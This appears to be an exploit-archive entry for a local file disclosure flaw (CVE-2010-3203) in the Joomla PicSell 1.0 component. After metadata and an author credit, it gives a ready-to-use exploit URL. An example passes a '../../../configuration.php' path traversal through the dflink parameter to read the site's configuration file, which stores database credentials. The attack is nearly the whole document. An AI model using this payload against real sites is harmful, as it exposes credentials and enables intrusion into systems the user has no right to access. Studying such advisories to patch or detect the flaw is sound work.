Joomla! Component PicSell 1.0 - Local File Disclosure

Author: Craw
type: webapps
platform: php
port: 
date_added: 2010-08-30  
date_updated: 2016-12-20  
verified: 1  
codes: CVE-2010-3203;OSVDB-67740  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 14845.txt  

# Author: Craw
# Email: craw@element7.eu
# Software Link: http://vm.xmlswf.com/index.php?option=com_content&view=article&id=104&Itemid=131
# Category: web applications

=======================================================

[+] ExploiT :

 http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=[File Disclosure]


[+] Example :

 http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php


=======================================================
Greetz @ LUXEMBOURG
=======================================================